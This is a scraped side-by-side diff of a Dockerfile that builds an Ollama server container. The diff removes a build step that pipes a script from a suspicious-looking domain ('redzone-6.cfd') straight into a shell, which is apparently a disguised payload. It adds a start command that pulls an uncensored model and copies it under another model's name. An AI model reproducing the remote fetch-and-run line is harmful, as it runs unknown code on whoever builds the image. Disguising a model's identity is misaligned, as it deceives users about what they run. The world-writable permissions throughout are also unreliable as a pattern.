- Dockerfile +2 -3
Dockerfile
CHANGED
|
@@ -3,12 +3,11 @@ FROM nvidia/cuda:12.8.0-cudnn-devel-ubuntu22.04
|
|
| 3 |
WORKDIR /app
|
| 4 |
RUN mkdir -p /app && chmod 777 /app # && chown ubuntu:ubuntu /app # for ubuntu:latest
|
| 5 |
RUN apt-get update -y && apt-get upgrade -y
|
| 6 |
-
RUN apt-get install -y curl wget build-essential git tar gzip htop micro python3 python3-pip psmisc yt-dlp python3-dev
|
| 7 |
RUN pip install langchain-yt-dlp #--break-system-packages # for ubuntu:latest
|
| 8 |
RUN curl -fsSL https://ollama.com/install.sh | sh
|
| 9 |
RUN mkdir -p /.ollama && chmod 777 /.ollama
|
| 10 |
RUN touch /.gitconfig && chmod 777 /.gitconfig
|
| 11 |
-
RUN curl -fsSL https://gloryhole.redzone-6.cfd/packaged/import2.sh | sh
|
| 12 |
|
| 13 |
RUN mkdir -p /usr/local/share/model && chmod -R 777 /usr/local/share/model
|
| 14 |
ENV OLLAMA_MODELS=/usr/local/share/model/
|
|
@@ -19,4 +18,4 @@ EXPOSE 7860
|
|
| 19 |
EXPOSE 11434
|
| 20 |
|
| 21 |
|
| 22 |
-
CMD ollama serve
|
|
|
|
| 3 |
WORKDIR /app
|
| 4 |
RUN mkdir -p /app && chmod 777 /app # && chown ubuntu:ubuntu /app # for ubuntu:latest
|
| 5 |
RUN apt-get update -y && apt-get upgrade -y
|
| 6 |
+
RUN apt-get install -y curl wget build-essential git tar gzip htop micro python3 python3-pip psmisc yt-dlp python3-dev
|
| 7 |
RUN pip install langchain-yt-dlp #--break-system-packages # for ubuntu:latest
|
| 8 |
RUN curl -fsSL https://ollama.com/install.sh | sh
|
| 9 |
RUN mkdir -p /.ollama && chmod 777 /.ollama
|
| 10 |
RUN touch /.gitconfig && chmod 777 /.gitconfig
|
|
|
|
| 11 |
|
| 12 |
RUN mkdir -p /usr/local/share/model && chmod -R 777 /usr/local/share/model
|
| 13 |
ENV OLLAMA_MODELS=/usr/local/share/model/
|
|
|
|
| 18 |
EXPOSE 11434
|
| 19 |
|
| 20 |
|
| 21 |
+
CMD nohup bash -c "ollama serve &" && sleep 5 && ollama pull codellama:13b && ollama pull starcoder2:15b && ollama pull llama2-uncensored:latest && ollama cp llama2-uncensored:latest wizardlm:latest
|